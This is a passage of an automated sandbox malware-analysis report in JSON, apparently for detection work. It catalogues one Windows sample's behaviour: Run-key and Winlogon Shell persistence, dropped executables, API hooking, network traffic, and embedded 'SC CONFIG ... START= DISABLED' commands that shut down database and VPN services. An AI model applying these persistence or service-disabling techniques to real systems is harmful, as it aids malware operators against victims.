registry for installed applications", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\ SC CONFIG SQLWRITER START= DISABLED.EXE\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\ SC CONFIG SQLWRITER START= DISABLED.EXE\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\ SC CONFIG SSTPSVC START= DISABLED.EXE\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\ SC CONFIG SSTPSVC START= DISABLED.EXE\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC CONFIG SQLTELEMETRY$ECWDB2 START= DISABLED.EXE\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC CONFIG SQLTELEMETRY$ECWDB2 START= DISABLED.EXE\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC CONFIG SQLTELEMETRY START= DISABLED.EXE\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC CONFIG SQLTELEMETRY START= DISABLED.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"NAMESERVER\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPNAMESERVER\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"NAMESERVER\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPNAMESERVER\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\\\* (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter NETFXSBS10.exe (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter netfxsbs12.hkf (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter sbscmp10.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter sbscmp20_mscorwks.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter sbscmp20_perfcounter.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter sbs_diasymreader.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter sbs_iehost.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.jscript.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.vsa.vb.codedomprocessor.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter sbs_mscordbi.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter sbs_mscorrc.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter sbs_mscorsec.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter sbs_system.configuration.install.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter sbs_system.data.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter sbs_system.enterpriseservices.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter sbs_VsaVb7rt.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter sbs_wminet_utils.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter SharedReg12.dll (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter v1.0.3705 (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter v1.1.4322 (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"FindNextFileW\" with parameter v2.0.50727 (UID: 00000000-00005752)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"704710986\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1661011692\"\n \"cx\": \"1\"\n \"cy\": \"1\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "registry-106", "type": 3, "relevance": 3, "name": "Read system defined device setup information from registry", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CLASS\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0002\"; Key: \"PRUNINGMODE\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005752)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "certificate-3", "type": 17, "relevance": 5, "name": "Short-term SSL certificate detected", "description": "Short term registered certificate: \"vgmsite.com\" (89 days old)", "origin": "Certificate Data", "attck_id": "T1583.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "certificate-4", "type": 17, "relevance": 5, "name": "Recently renewed or created SSL certificate", "description": "Newly renewed or created SSL certificate: \"vgmsite.com\" (0 days old)", "origin": "Certificate Data", "attck_id": "T1583.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00005752)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"SEARCHLIST\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPV6DOMAIN\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"NAMESERVER\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"NAMESERVER\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPNAMESERVER\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"NAMESERVER\"; Value: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPNAMESERVER\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"MY PROGRAM\"; Value: \"\\C:\\946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\\\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "details too long to display", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"xlsrvintl.dll\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%COMMONPROGRAMFILES%\\microsoft shared\\OFFICE14\\1033\\xlsrvintl.dll]- [targetUID: 00000000-00005752]\n \"DISMHOST.EXE.67AB3F4E.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"DISMHOST.EXE.67AB3F4E.bin\" has section name .text with entropy \"6.11476781338\"\n \"DISMHOST.EXE.67AB3F4E.bin\" has section name .data with entropy \"6.44580003198\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "hooks-0", "type": 11, "relevance": 10, "name": "Hooks API calls", "description": "\"FindFirstFileA@KERNEL32.DLL\" in \"WScript.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"WScript.exe\"\n \"GetLogicalDriveStringsA@KERNEL32.DLL\" in \"WScript.exe\"\n \"OpenMutexW@KERNEL32.DLL\" in \"WScript.exe\"\n \"LoadLibraryW@KERNEL32.DLL\" in \"WScript.exe\"\n \"OpenMutexA@KERNEL32.DLL\" in \"WScript.exe\"\n \"CreateDirectoryW@KERNEL32.DLL\" in \"WScript.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"WScript.exe\"\n \"FindResourceW@KERNEL32.DLL\" in \"WScript.exe\"\n \"GetLogicalDriveStringsW@KERNEL32.DLL\" in \"WScript.exe\"\n \"CreateToolhelp32Snapshot@KERNEL32.DLL\" in \"WScript.exe\"\n \"LoadLibraryExA@KERNEL32.DLL\" in \"WScript.exe\"\n \"GetProcAddress@KERNEL32.DLL\" in \"WScript.exe\"\n \"Process32FirstW@KERNEL32.DLL\" in \"WScript.exe\"\n \"WinExec@KERNEL32.DLL\" in \"WScript.exe\"\n \"GetNativeSystemInfo@KERNEL32.DLL\" in \"WScript.exe\"\n \"send@WS2_32.DLL\" in \"WScript.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"WScript.exe\"\n \"LoadResource@KERNEL32.DLL\" in \"WScript.exe\"\n \"CreateProcessA@KERNEL32.DLL\" in \"WScript.exe\"\n \"CopyFileA@KERNEL32.DLL\" in \"WScript.exe\"\n \"CopyFileW@KERNEL32.DLL\" in \"WScript.exe\"\n \"FindResourceA@KERNEL32.DLL\" in \"WScript.exe\"\n \"RemoveDirectoryW@KERNEL32.DLL\" in \"WScript.exe\"\n \"CreateProcessW@KERNEL32.DLL\" in \"WScript.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"MY PROGRAM\"; Value: \"\\C:\\946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\\\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\"; Key: \"SHELL\"; Value: \"C:\\946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLEFILETRACING\"; Value: \"00000000\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLECONSOLETRACING\"; Value: \"00000000\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Access type: 